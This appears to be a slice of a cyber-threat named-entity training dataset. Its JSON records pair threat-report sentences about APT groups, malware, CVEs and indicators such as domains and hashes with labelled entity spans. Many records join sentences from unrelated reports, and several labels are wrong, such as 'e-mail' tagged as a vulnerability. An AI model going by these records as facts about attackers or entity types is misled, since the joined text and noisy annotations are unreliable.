{"text": "This particular operation has been active since approximately May 2016 up to the present time . This Malware Analysis Report ( MAR ) is the result of analytic efforts between the Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) . The chfeeds.vbe file acts as a downloader and was used to download a second powershell script ( registry.ps1 ) . They would then initiate communication with additional C2 infrastructure to execute obfuscated PowerShell scripts .", "spans": {"ORGANIZATION: Department of Homeland Security": [[179, 210]], "ORGANIZATION: DHS": [[213, 216]], "ORGANIZATION: FBI": [[261, 264]], "FILEPATH: chfeeds.vbe": [[273, 284]], "TOOL: powershell": [[345, 355]], "FILEPATH: registry.ps1": [[365, 377]]}, "info": {"id": "cyberner_stix_train_005499", "source": "cyberner_stix_train"}}
{"text": "APT19 seemed to be going after defense sector firms , Chinese dissident groups and other political target , as well as certain financial targets and other commercial targets in pharmaceutical and energy sectors that could benefit the Chinese economy . In particular , FireEye during the fall of 2013 called out infrastructure overlap between Ephemeral Hydra and DeputyDog .", "spans": {"THREAT_ACTOR: APT19": [[0, 5]], "ORGANIZATION: defense sector firms": [[31, 51]], "ORGANIZATION: political target": [[89, 105]], "ORGANIZATION: financial": [[127, 136]], "ORGANIZATION: commercial": [[155, 165]], "ORGANIZATION: pharmaceutical": [[177, 191]], "ORGANIZATION: energy sectors": [[196, 210]], "ORGANIZATION: FireEye": [[268, 275]], "MALWARE: DeputyDog": [[362, 371]]}, "info": {"id": "cyberner_stix_train_005500", "source": "cyberner_stix_train"}}
{"text": "We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution (RCE) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor . Our primary contribution in this update is to implicate Bahamut in what are likely counterterrorism-motivated surveillance operations , and to further affirm our belief that the group is a hacker-for-hire operation .", "spans": {"THREAT_ACTOR: groups": [[15, 21]], "VULNERABILITY: CVE-2018-0798": [[35, 48]]}, "info": {"id": "cyberner_stix_train_005501", "source": "cyberner_stix_train"}}
{"text": "This minimizes the risk of detection and infection of unwanted victims .", "spans": {}, "info": {"id": "cyberner_stix_train_005502", "source": "cyberner_stix_train"}}
{"text": "The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent .", "spans": {"MALWARE: malware": [[4, 11]], "FILEPATH: bait document": [[135, 148]], "TOOL: Word": [[198, 202]], "VULNERABILITY: CVE-2012-0158": [[232, 245]], "VULNERABILITY: exploit": [[246, 253]]}, "info": {"id": "cyberner_stix_train_005503", "source": "cyberner_stix_train"}}
{"text": "Get system information .", "spans": {}, "info": {"id": "cyberner_stix_train_005504", "source": "cyberner_stix_train"}}
{"text": "READ_SMS - allow the application to read text messages . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone . The use of Emissary appears to be focused only on Taiwan and Hong Kong , with regular malware updates to avoid detection and to increase the odds of success .", "spans": {"MALWARE: ShooterAudio module": [[61, 80]], "TOOL: PulseAudio": [[86, 96]], "MALWARE: Emissary": [[154, 162]]}, "info": {"id": "cyberner_stix_train_005505", "source": "cyberner_stix_train"}}
{"text": "As with many of their other campaigns , TA505 delivered Shifu through macro laden Microsoft Office document attachments .", "spans": {"THREAT_ACTOR: TA505": [[40, 45]], "MALWARE: Shifu": [[56, 61]], "TOOL: macro": [[70, 75]], "ORGANIZATION: Microsoft": [[82, 91]], "TOOL: Office": [[92, 98]]}, "info": {"id": "cyberner_stix_train_005506", "source": "cyberner_stix_train"}}
{"text": "Geography of Rotexy attacks According to our data , 98 % of all Rotexy attacks target users in Russia . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . TEMP.Periscope overlaps in targeting , as well as tactics , techniques , and procedures ( TTPs ) , with TEMP.Jumper , a group that also overlaps significantly with public reporting on NanHaiShu .", "spans": {"MALWARE: Rotexy": [[13, 19], [64, 70]], "THREAT_ACTOR: Patchwork": [[113, 122]], "MALWARE: RTF files": [[149, 158]], "VULNERABILITY: CVE-2017-8570": [[170, 183]], "THREAT_ACTOR: TEMP.Periscope": [[186, 200]], "THREAT_ACTOR: TEMP.Jumper": [[290, 301]], "MALWARE: NanHaiShu": [[370, 379]]}, "info": {"id": "cyberner_stix_train_005507", "source": "cyberner_stix_train"}}
{"text": "As we ’ ve seen in last year ’ s mobile threat landscape , we expect more cyberespionage campaigns targeting the mobile platform given its ubiquity , employing tried-and-tested techniques to lure unwitting users . The common use of the Enfal Trojan suggests that Shadow Network may be exchanging tools and techniques . During our research , we found various job advertisements associated with the company on freelance and remote-work websites . DarkTortilla has used % HiddenReg%", "spans": {"TOOL: Enfal Trojan": [[236, 248]], "MALWARE: DarkTortilla": [[445, 457]]}, "info": {"id": "cyberner_stix_train_005508", "source": "cyberner_stix_train"}}
{"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . Researchers from various security organizations have used a variety of names to assign responsibility for the hacks , including LEAD , BARIUM , Wicked Panda , GREF , PassCV , Axiom , and Winnti .", "spans": {"TOOL: DanderSpritz": [[0, 12]], "THREAT_ACTOR: LEAD": [[250, 254]], "THREAT_ACTOR: BARIUM": [[257, 263]], "THREAT_ACTOR: Wicked Panda": [[266, 278]], "THREAT_ACTOR: GREF": [[281, 285]], "THREAT_ACTOR: PassCV": [[288, 294]], "THREAT_ACTOR: Axiom": [[297, 302]], "THREAT_ACTOR: Winnti": [[309, 315]]}, "info": {"id": "cyberner_stix_train_005509", "source": "cyberner_stix_train"}}
{"text": "It remains available within the source code but no method of use takes place . On January 15 , Confiant exposed the activity of the Zirconium group , spreading malicious ads via a network of fake ad agencies through 2017 , in what amounted to the largest malvertising campaign of recent times . Much like Darwin ’s theory of biological evolution , APT12 been forced to evolve and adapt in order to maintain its mission . An APT32 backdoor can use HTTP over a non - standard TCP port ( e.g 14146 ) which is specified in the backdoor configuration.[5 ]", "spans": {"ORGANIZATION: fake ad agencies": [[191, 207]], "THREAT_ACTOR: APT12": [[348, 353]], "MALWARE: APT32 backdoor": [[424, 438]]}, "info": {"id": "cyberner_stix_train_005510", "source": "cyberner_stix_train"}}
{"text": "SeaDuke is a simple backdoor that focuses on executing commands retrieved from its C&C server , such as uploading and downloading files , executing system commands and evaluating additional Python code .", "spans": {"MALWARE: SeaDuke": [[0, 7]], "TOOL: C&C": [[83, 86]], "TOOL: Python": [[190, 196]]}, "info": {"id": "cyberner_stix_train_005511", "source": "cyberner_stix_train"}}
{"text": "* * * End translation * * * The phishing template then presents additional instructions for installing the fake security application ( Figure 5 ) : Figure 5 : Additional instructions telling the victim to give the app the requested permissions ( English translation below ) , with stolen branding and fraudulent copy * * * Translation * * * Step 2 : Allow installation Open your device 's settings , select Security or Applications ( depending on the device ) , and check Unknown sources . These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . APT37 ScarCruft , Reaper , Group123 , TEMP.Reaper APT37 is a suspected North Korean cyber espionage group that has been active since at least 2012 .", "spans": {"THREAT_ACTOR: actors": [[496, 502]], "ORGANIZATION: manage": [[621, 627]], "ORGANIZATION: ccTLDs": [[628, 634]], "THREAT_ACTOR: APT37": [[637, 642], [687, 692]], "THREAT_ACTOR: ScarCruft": [[643, 652]], "THREAT_ACTOR: Reaper": [[655, 661]], "THREAT_ACTOR: Group123": [[664, 672]], "THREAT_ACTOR: TEMP.Reaper": [[675, 686]]}, "info": {"id": "cyberner_stix_train_005512", "source": "cyberner_stix_train"}}
{"text": "FakeSpy behavior on physical device vs emulator ( anti-emulator ) . The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less” aspect of this method . The Ke3chang attackers used the older MyWeb malware family from 2010 to 2011 .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "MALWARE: GRIFFON": [[76, 83]], "THREAT_ACTOR: Ke3chang": [[197, 205]], "THREAT_ACTOR: attackers": [[206, 215]], "MALWARE: MyWeb": [[231, 236]], "MALWARE: malware": [[237, 244]]}, "info": {"id": "cyberner_stix_train_005513", "source": "cyberner_stix_train"}}
{"text": "Note that we later found versions that used the domain as a C2 directly instead of the IP address . ASERT uncovered a credential theft campaign we call LUCKY ELEPHANT where attackers masquerade as legitimate entities such as foreign government , telecommunications , and military . ScarCruft tools : 07d2200f5c2d03845adb5b20841faa94 AV Remover .", "spans": {"ORGANIZATION: ASERT": [[100, 105]], "THREAT_ACTOR: LUCKY ELEPHANT": [[152, 166]], "ORGANIZATION: foreign government": [[225, 243]], "ORGANIZATION: telecommunications": [[246, 264]], "ORGANIZATION: military": [[271, 279]], "THREAT_ACTOR: ScarCruft": [[282, 291]], "FILEPATH: 07d2200f5c2d03845adb5b20841faa94": [[300, 332]], "TOOL: AV Remover": [[333, 343]]}, "info": {"id": "cyberner_stix_train_005514", "source": "cyberner_stix_train"}}
{"text": "Figure 9 : Malware secretly adds malicious resources to the DEX file Now , after the alteration of the original application , Android ’ s package manager will think that this is an update for the application signed by the same certificate , but in reality , it will execute the malicious DEX file . Buhtrap resurfaced in the beginning of 2017 in the TwoBee campaign , where it served primarily as means of malware delivery . exe so that they do n’t have to rely on the target system having a ZIP utility . On June 22 , @AnFam17 spotted the same fake browser update leveraging URL shortcuts .", "spans": {"SYSTEM: Android": [[126, 133]], "FILEPATH: exe": [[425, 428]], "TOOL: ZIP utility": [[492, 503]], "ORGANIZATION: @AnFam17": [[519, 527]]}, "info": {"id": "cyberner_stix_train_005515", "source": "cyberner_stix_train"}}
{"text": "Decompiled exploit function code fragment run_with_mmap function from the android-rooting-tools project As can be seen from the comparison , there are similar strings and also a unique comment in Italian , so it looks like the attackers created this exploit payload based on android-rooting-tools project source code . These conflicts have even resulted in Haftar leading an attack on the capital city in April . Turla is a Russian-based threat group that has infected victims in over 45 countries , spanning a range of industries including government , embassies , military , education , research and pharmaceutical companies since 2004 .", "spans": {"SYSTEM: android-rooting-tools": [[74, 95], [275, 296]], "THREAT_ACTOR: Haftar": [[357, 363]], "THREAT_ACTOR: Turla": [[413, 418]], "ORGANIZATION: government": [[541, 551]], "ORGANIZATION: embassies": [[554, 563]], "ORGANIZATION: military": [[566, 574]], "ORGANIZATION: pharmaceutical companies": [[602, 626]]}, "info": {"id": "cyberner_stix_train_005516", "source": "cyberner_stix_train"}}
{"text": "In Figure 1 , which is based on FireEye Dynamic threat Intelligence (DTI) reports shared in March 2017 , we can see the regions affected by Magnitude EK activity during the last three months of 2016 and the first three months of 2017 . APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations .", "spans": {"ORGANIZATION: FireEye": [[32, 39]], "THREAT_ACTOR: APT37": [[236, 241]], "ORGANIZATION: research fellow": [[253, 268]], "ORGANIZATION: advisory member": [[271, 286]], "ORGANIZATION: journalist": [[293, 303]], "ORGANIZATION: strategic organizations": [[367, 390]]}, "info": {"id": "cyberner_stix_train_005517", "source": "cyberner_stix_train"}}
{"text": "This adversary has been identified leveraging custom-developed plugins for versions 2 and 3 of the commodity malware Black Energy to target entities associated with energy , industrial control systems and SCADA , government , and media for espionage and destructive purposes , since at least 2011 . Keeping in mind the sensitivity of passwords , GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task .", "spans": {"TOOL: Black Energy": [[117, 129]], "ORGANIZATION: energy": [[165, 171]], "ORGANIZATION: government": [[213, 223]], "ORGANIZATION: media": [[230, 235]], "THREAT_ACTOR: espionage": [[240, 249]], "THREAT_ACTOR: GoCrack": [[346, 353]], "ORGANIZATION: additional users": [[487, 503]]}, "info": {"id": "cyberner_stix_train_005518", "source": "cyberner_stix_train"}}
{"text": "One of PLATINUM 's most recent and interesting tools is meant to inject code into processes using a variety of injection techniques . According to Kaspersky Lab 's report , this threat actor has been active since as early as 2004 ; however , the highest volume of activity occurred from 2010 – 2013 .", "spans": {"THREAT_ACTOR: PLATINUM": [[7, 15]], "ORGANIZATION: Kaspersky Lab": [[147, 160]]}, "info": {"id": "cyberner_stix_train_005519", "source": "cyberner_stix_train"}}
{"text": "Search web log files for evidence of web server scanning using the URIs listed in the Exploitation section and evidence of Exfiltration using the User-Agent in the Actions on objective section .", "spans": {"TOOL: User-Agent": [[146, 156]]}, "info": {"id": "cyberner_stix_train_005520", "source": "cyberner_stix_train"}}
{"text": "When the Quasar serve retrieves the name of the uploaded file from the victim , it does not verify that it is a valid file path .", "spans": {"MALWARE: Quasar": [[9, 15]]}, "info": {"id": "cyberner_stix_train_005521", "source": "cyberner_stix_train"}}
{"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1) , and executing it using ShellExecute() . The document attached to this e-mail exploits CVE-2012-0158 .", "spans": {"VULNERABILITY: CVE-2017-10271": [[110, 124]], "TOOL: PowerShell": [[138, 148]], "VULNERABILITY: e-mail": [[288, 294]], "VULNERABILITY: exploits": [[295, 303]], "VULNERABILITY: CVE-2012-0158": [[304, 317]]}, "info": {"id": "cyberner_stix_train_005522", "source": "cyberner_stix_train"}}
{"text": "However , over the last nine campaigns since Trend Micro‘s June report , TA505 also started using .ISO image attachments as the point of entry , as well as a .NET downloader , a new style for macro delivery , a newer version of ServHelper , and a .DLL variant of FlawedAmmyy downloader . The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments -m security .", "spans": {"ORGANIZATION: Trend Micro‘s": [[45, 58]], "THREAT_ACTOR: TA505": [[73, 78]], "TOOL: .NET downloader": [[158, 173]], "TOOL: ServHelper": [[228, 238]], "MALWARE: .DLL variant": [[247, 259]], "FILEPATH: malware": [[292, 299]], "FILEPATH: mssecsvc2.0": [[338, 349]]}, "info": {"id": "cyberner_stix_train_005523", "source": "cyberner_stix_train"}}
{"text": "] su/ChristinaMorrow hxxp : //homevideo2-12l [ . Considering the volume of Naikon activity observed and its relentless , repeated attack attempts , such a confrontation was worth looking into , so we did . Rancor : AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609 . Ashley Madison ’s parent company — Toronto - based Avid Life Media — filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner .", "spans": {"THREAT_ACTOR: Rancor": [[206, 212]], "FILEPATH: AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609": [[215, 279]], "ORGANIZATION: Ashley Madison ’s parent company": [[282, 314]], "ORGANIZATION: Avid Life Media": [[333, 348]], "ORGANIZATION: Dennis Bradshaw": [[440, 455]]}, "info": {"id": "cyberner_stix_train_005524", "source": "cyberner_stix_train"}}
{"text": "THE INITIAL INSTALLATION PROCESS Once installed , EventBot prompts the user to give it access to accessibility services . The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . Magic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia .", "spans": {"MALWARE: EventBot": [[50, 58]], "MALWARE: RAT": [[126, 129]], "ORGANIZATION: energy": [[355, 361]], "ORGANIZATION: government": [[364, 374]], "ORGANIZATION: technology sectors": [[381, 399]]}, "info": {"id": "cyberner_stix_train_005525", "source": "cyberner_stix_train"}}
{"text": "Doing a Google search for the Pastebin userid landed me on a YouTube video posted by an individual demonstrating his modified version of njRAT control panel/builder kit .", "spans": {"ORGANIZATION: Google": [[8, 14]], "TOOL: Pastebin": [[30, 38]], "ORGANIZATION: YouTube": [[61, 68]], "TOOL: njRAT control panel/builder kit": [[137, 168]]}, "info": {"id": "cyberner_stix_train_005526", "source": "cyberner_stix_train"}}
{"text": "Figure 8 . Cisco Talos assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 . Phrases and sentences were borrowed from at least the following companies/sites : DKSec – www.dksec.com , OKIOK – www.okiok.com/services/tailored-solutions , MainNerve – www.mainnerve.com , Datics – www.datatics.com/cyber-security , Perspective Risk – www.perspectiverisk.com , Synack – https://www.synack.com/company , FireEye – https://www.fireeye.com/services/penetration-testing.html . Adversaries may abuse these features to hide artifacts such as files , directories , user accounts , or other system activity to evade detection.[1][2][3 ]", "spans": {"ORGANIZATION: Cisco Talos": [[11, 22]], "ORGANIZATION: DKSec": [[282, 287]], "DOMAIN: www.dksec.com": [[290, 303]], "ORGANIZATION: OKIOK": [[306, 311]], "DOMAIN: www.okiok.com/services/tailored-solutions": [[314, 355]], "ORGANIZATION: MainNerve": [[358, 367]], "DOMAIN: www.mainnerve.com": [[370, 387]], "ORGANIZATION: Datics": [[390, 396]], "DOMAIN: www.datatics.com/cyber-security": [[399, 430]], "ORGANIZATION: Perspective Risk": [[433, 449]], "DOMAIN: www.perspectiverisk.com": [[452, 475]], "ORGANIZATION: Synack": [[478, 484]], "DOMAIN: https://www.synack.com/company": [[487, 517]], "ORGANIZATION: FireEye": [[520, 527]], "URL: https://www.fireeye.com/services/penetration-testing.html": [[530, 587]], "THREAT_ACTOR: Adversaries": [[590, 601]]}, "info": {"id": "cyberner_stix_train_005527", "source": "cyberner_stix_train"}}
{"text": "Control of malware from a single center provides maximum flexibility . PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land . This also suggests that these modules were built a few hours before the launcher itself , whose compilation timestamp is Thu Oct 24 14:10:32 2019 . Hello . 3 am The time of mysticism , is nt it", "spans": {"TOOL: PsExec": [[71, 77]]}, "info": {"id": "cyberner_stix_train_005528", "source": "cyberner_stix_train"}}
{"text": "Suckfly spent more time attacking the government networks compared to all but one of the commercial targets .", "spans": {"THREAT_ACTOR: Suckfly": [[0, 7]]}, "info": {"id": "cyberner_stix_train_005529", "source": "cyberner_stix_train"}}
{"text": "amellet.bit danrnysvp.com ejtmjealr.com firop.com gefinsioje.com gesofgamd.com ponedobla.bit unoset.com .", "spans": {"DOMAIN: amellet.bit": [[0, 11]], "DOMAIN: danrnysvp.com": [[12, 25]], "DOMAIN: ejtmjealr.com": [[26, 39]], "DOMAIN: firop.com": [[40, 49]], "DOMAIN: gefinsioje.com": [[50, 64]], "DOMAIN: gesofgamd.com": [[65, 78]], "DOMAIN: ponedobla.bit": [[79, 92]], "DOMAIN: unoset.com": [[93, 103]]}, "info": {"id": "cyberner_stix_train_005530", "source": "cyberner_stix_train"}}
{"text": "It includes information about the smartphone model , the OS version , the mobile operator , and the Trojan version . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . The Shellbot script is added to run after the victim ’s system reboots , and scripts /a/upd , /b/sync/ , and /c/aptitude/ are added to the crontab . CozyDuke droppers and spyware components often maintain fairly common characteristics , but the files ’ functionality is slightly modified depending on the actor ’s needs .", "spans": {"THREAT_ACTOR: TG-3390": [[133, 140]], "VULNERABILITY: CVE-2011-3544": [[155, 168]], "TOOL: HTTPBrowser backdoor": [[236, 256]], "VULNERABILITY: CVE-2010-0738": [[263, 276]], "TOOL: JBoss": [[298, 303]], "MALWARE: Shellbot": [[423, 431]], "MALWARE: CozyDuke": [[568, 576]]}, "info": {"id": "cyberner_stix_train_005531", "source": "cyberner_stix_train"}}
{"text": "Attackers used the DynamicDNS to host the c2 server , this allows the attacker to quickly change the IP address in real time if the malware c2 server infrastructure is unavailable .", "spans": {"TOOL: DynamicDNS": [[19, 29]], "TOOL: c2": [[42, 44], [140, 142]]}, "info": {"id": "cyberner_stix_train_005532", "source": "cyberner_stix_train"}}
{"text": "Haniyeh_will_remain_abroad_and_Hamas_rises_in_Gaza.pdf : 5b476e05aacea9edc14f7e4bab1b724ef54915f30c39ac87503ed395feae611e .", "spans": {"FILEPATH: Haniyeh_will_remain_abroad_and_Hamas_rises_in_Gaza.pdf": [[0, 54]], "FILEPATH: 5b476e05aacea9edc14f7e4bab1b724ef54915f30c39ac87503ed395feae611e": [[57, 121]]}, "info": {"id": "cyberner_stix_train_005533", "source": "cyberner_stix_train"}}
{"text": "in .Net – skype_sync2.exe . This paper will cover the discovery of this campaign , dubbed ‘Operation Sheep’ , and an analysis of SWAnalytics . This group has aggressively targeted and compromised point of sale ( PoS ) systems in the hospitality and retail sectors .", "spans": {"SYSTEM: .Net": [[3, 7]], "THREAT_ACTOR: ‘Operation Sheep’": [[90, 107]]}, "info": {"id": "cyberner_stix_train_005534", "source": "cyberner_stix_train"}}
{"text": "The group is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that . In September 2017 , we discovered Silence attack on financial institutions .", "spans": {"ORGANIZATION: WikiLeaks'": [[40, 50]], "ORGANIZATION: Twitter": [[102, 109], [166, 173]], "ORGANIZATION: Pinterest": [[178, 187]], "ORGANIZATION: BuzzFeed": [[217, 225]], "ORGANIZATION: TechCrunch": [[230, 240]], "ORGANIZATION: financial institutions": [[315, 337]]}, "info": {"id": "cyberner_stix_train_005535", "source": "cyberner_stix_train"}}
{"text": "For this particular packet , the reason is registration of the bot . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . APT34 uses a mix of public and non-public tools .", "spans": {"TOOL: Visma": [[135, 140]], "THREAT_ACTOR: APT10": [[197, 202]], "MALWARE: 1.bat": [[238, 243]], "MALWARE: cu.exe": [[246, 252]], "MALWARE: ss.rar": [[255, 261]], "MALWARE: r.exe": [[264, 269]], "MALWARE: pd.exe": [[272, 278]], "THREAT_ACTOR: APT34": [[281, 286]], "MALWARE: public and non-public tools": [[301, 328]]}, "info": {"id": "cyberner_stix_train_005536", "source": "cyberner_stix_train"}}
{"text": "On November 26 , 2015 , a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . The malicious attachments purported to be invitations or drafts of the agenda for the conference .", "spans": {"THREAT_ACTOR: APT group": [[48, 57]], "ORGANIZATION: financial": [[137, 146]], "ORGANIZATION: high-tech companies": [[151, 170]], "FILEPATH: malicious attachments": [[177, 198]], "MALWARE: invitations": [[215, 226]], "MALWARE: drafts of the agenda": [[230, 250]]}, "info": {"id": "cyberner_stix_train_005537", "source": "cyberner_stix_train"}}
{"text": "The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT . Taidoor actively sent out malicious documents and maintained several IP addresses for command and control .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: social media": [[30, 42]], "TOOL: RATs": [[189, 193]], "TOOL: PupyRAT": [[202, 209]]}, "info": {"id": "cyberner_stix_train_005538", "source": "cyberner_stix_train"}}
{"text": "Targeting appears to be widely spread across the Middle East , Europe , and Asia .", "spans": {}, "info": {"id": "cyberner_stix_train_005539", "source": "cyberner_stix_train"}}
{"text": "Why Did Chinese Spyware Linger in U.S . After almost two weeks , on August 30 , 2018 , APT10 attackers used their access to the network to move laterally and made their first deployment of an RC4- and Salsa20-encrypted variant of the Trochilus malware using a previously associated DLL sideloading techniquE . The message asked the recipient to rename the attachment extension from “ ._X_ ” to “ .exe ” and opening it with the password specified in the email to view the Happy New Year eCard in the correct and polite language .", "spans": {"THREAT_ACTOR: APT10": [[87, 92]], "TOOL: Trochilus": [[234, 243]], "FILEPATH: ._X_": [[384, 388]], "FILEPATH: .exe": [[396, 400]], "TOOL: email": [[453, 458]]}, "info": {"id": "cyberner_stix_train_005540", "source": "cyberner_stix_train"}}
{"text": "The Korean malware Wroba , in addition to the traditional vector of infection via file-sharing services , spreads via alternative app stores . Starting in March 2018 , we observed a significant change in the campaign : it now leverages the open source exploitation framework Metasploit before dropping the custom Mosquito backdoor . DllMain performs the initialization of ZxShell . Get Ready for Ransomware in 2023 with the ThreatConnect Platform", "spans": {"MALWARE: Wroba": [[19, 24]], "TOOL: Metasploit": [[275, 285]], "MALWARE: ZxShell": [[372, 379]]}, "info": {"id": "cyberner_stix_train_005541", "source": "cyberner_stix_train"}}
{"text": "Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled Договор.doc” [Contract.doc] . During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface – test.xls .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "MALWARE: malicious Microsoft Word attachment": [[70, 105]], "TOOL: C2": [[208, 210]], "FILEPATH: XLS-withyourface.xls": [[282, 302]], "FILEPATH: XLS-withyourface – test.xls": [[307, 334]]}, "info": {"id": "cyberner_stix_train_005542", "source": "cyberner_stix_train"}}
{"text": "We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . In the next incident , also in 2017 , software updates for the legitimate computer cleanup tool CCleaner was found to have been compromised by hackers to taint them with the same ShadowPad backdoor .", "spans": {"THREAT_ACTOR: Emissary Panda": [[11, 25]], "VULNERABILITY: vulnerability": [[55, 68]], "VULNERABILITY: CVE-2019-0604": [[104, 117]], "MALWARE: software updates": [[271, 287]], "MALWARE: ShadowPad backdoor": [[412, 430]]}, "info": {"id": "cyberner_stix_train_005543", "source": "cyberner_stix_train"}}
{"text": "Symantec researchers have discovered that this attack group , which we call Whitefly , has been operating since at least 2017 , has targeted organizations based mostly in Singapore across a wide variety of sectors , and is primarily interested in stealing large amounts of sensitive information . In 2016 , an attack campaign by this group was recorded in early May that made use of an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player , which at the time was both unknown and unpatched .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Whitefly": [[76, 84]], "VULNERABILITY: exploit": [[386, 393]], "VULNERABILITY: CVE-2016-4117": [[398, 411]], "TOOL: Flash": [[439, 444]]}, "info": {"id": "cyberner_stix_train_005544", "source": "cyberner_stix_train"}}
{"text": "Behavior patterns observed in TEMP.Veles activity are consistent with the Moscow time zone , where CNIIHM is located .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[30, 40]], "ORGANIZATION: CNIIHM": [[99, 105]]}, "info": {"id": "cyberner_stix_train_005545", "source": "cyberner_stix_train"}}
{"text": "This capability was confirmed when the Android permission , called android.permission.RECORD_AUDIO , was being requested along with code found in the app . Silence conducted a massive phishing campaign posing as the Central Bank of the Russian Federation . In a recent spear-phishing campaign , the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike .", "spans": {"SYSTEM: Android": [[39, 46]], "THREAT_ACTOR: Silence": [[156, 163]], "ORGANIZATION: Central Bank": [[216, 228]], "THREAT_ACTOR: Cobalt Hacking Group": [[299, 319]], "ORGANIZATION: Microsoft": [[366, 375]], "MALWARE: Cobalt Strike": [[441, 454]]}, "info": {"id": "cyberner_stix_train_005546", "source": "cyberner_stix_train"}}
{"text": "FakeSpy asks to be the default SMS app because it uses the function onReceive to intercept incoming SMS messages . According to Microsoft’s advisory , this vulnerability was patched on March 12 , 2019 and we first saw the webshell activity on April 1 , 2019 . traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "ORGANIZATION: Microsoft’s": [[128, 139]], "ORGANIZATION: aerospace": [[287, 296]], "ORGANIZATION: energy": [[299, 305]], "ORGANIZATION: government": [[308, 318]], "ORGANIZATION: high-tech": [[321, 330]], "ORGANIZATION: consulting services": [[333, 352]], "ORGANIZATION: chemicals": [[359, 368]], "ORGANIZATION: manufacturing": [[371, 384]], "ORGANIZATION: mining sectors": [[387, 401]]}, "info": {"id": "cyberner_stix_train_005547", "source": "cyberner_stix_train"}}
{"text": "Version # 1 : June 2019 — Domain : databit [ . While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) . In addition , the attackers ’ use of the proxy tool , HTran , also helped mask their true location . The problem is that CSP does n't support query strings ( See Spec ):", "spans": {"VULNERABILITY: zero-day exploit": [[172, 188]], "VULNERABILITY: CVE-2014-4148": [[191, 204]], "TOOL: HTran": [[263, 268]], "VULNERABILITY: CSP does n't support query strings": [[330, 364]]}, "info": {"id": "cyberner_stix_train_005548", "source": "cyberner_stix_train"}}
{"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April .", "spans": {"MALWARE: Pony DLL": [[89, 97]], "MALWARE: Vawtrak": [[102, 109]], "THREAT_ACTOR: ScarCruft": [[224, 233]], "VULNERABILITY: zero day": [[251, 259]], "VULNERABILITY: exploit": [[260, 267]], "VULNERABILITY: CVE-2016-0147": [[270, 283]]}, "info": {"id": "cyberner_stix_train_005549", "source": "cyberner_stix_train"}}
